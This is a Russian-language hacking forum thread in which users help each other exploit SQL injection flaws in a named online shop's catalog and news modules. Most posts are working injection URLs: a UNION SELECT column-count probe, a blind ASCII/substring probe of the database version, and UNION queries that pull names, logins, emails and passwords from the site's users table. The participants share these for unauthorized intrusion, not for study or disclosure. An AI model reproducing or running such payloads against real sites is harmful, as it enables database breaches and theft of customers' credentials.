Скуль

http://www.acasashop.md/?module=catalog&id=9999991'+union+select+0,1,2,3,4/*


Помогите плз перебрать к-во столбцов, а то не выходит у меня

 

У тебя заруб идёт на предварительном запрос, не на том, который выводится. Если бы ты был упорнее, ты бы нашёл модуль, где нету никаких предварительных запросов, ака "посчитать количество чего-либо" или "взять имя чего-то где модуль=чему-то". Например в модуле news есть SQL-Injection с выводом:

 

опередил.... лано от себя добавлю, что в модуле catalog можно пользовать подзапросы:
пример:

Code:

http://www.acasashop.md/?module=catalog&id=11'%20and%20ascii(substr((select%20version()),1,1))=52/*

 

Спс большое, плюсеги поставил )

 

ну и я добавлю

http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,concat(name,char(58),login),email,CONCAT_WS(0x3a,USER(%20),VERSION(),DATABASE()),password,6%20from%20users/*

 

вы скули ищете тулзами или ручками?

 

Piflit, есть скули, которые ни одна тулза не найдёт, когда для каждой нужен индивидуальный подход, поэтому я предпочитаю прямые ручки в противовес прогам.

 

Я ручьками )

 

и еще одна табличка)
http://www.acasashop.md/?module=news&cmd=view&id=-16'+UNION+SELECT+1,password,3,4,name,6%20from%20iesystem_acasashop.users/*

 

kair, да ты потрошишь одну и ту же табличку... )))